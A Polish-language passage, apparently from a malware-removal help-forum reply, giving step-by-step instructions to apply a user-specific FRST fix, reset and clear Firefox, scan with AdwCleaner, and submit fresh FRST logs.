tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 3. Zastosuj AdwCleaner z opcji Szukaj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.